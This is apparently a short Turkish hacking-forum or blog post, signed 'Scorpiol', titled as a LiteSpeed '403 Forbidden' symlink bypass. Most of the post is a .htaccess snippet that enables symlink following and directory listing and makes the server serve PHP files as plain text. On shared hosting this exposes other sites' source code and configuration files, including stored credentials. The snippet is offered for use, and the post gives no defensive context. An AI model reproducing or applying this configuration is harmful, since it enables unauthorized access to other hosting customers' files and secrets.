Litespeed (403 Forbidden) Symlink Bypass

.htaccess :
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php

Bu yazıyı sitenizde/forumunuzda paylaşmak için aşağıdaki linkleri kullanabilirsiniz..
Scorpiol


Yorum Gönderme

0 Yorumlar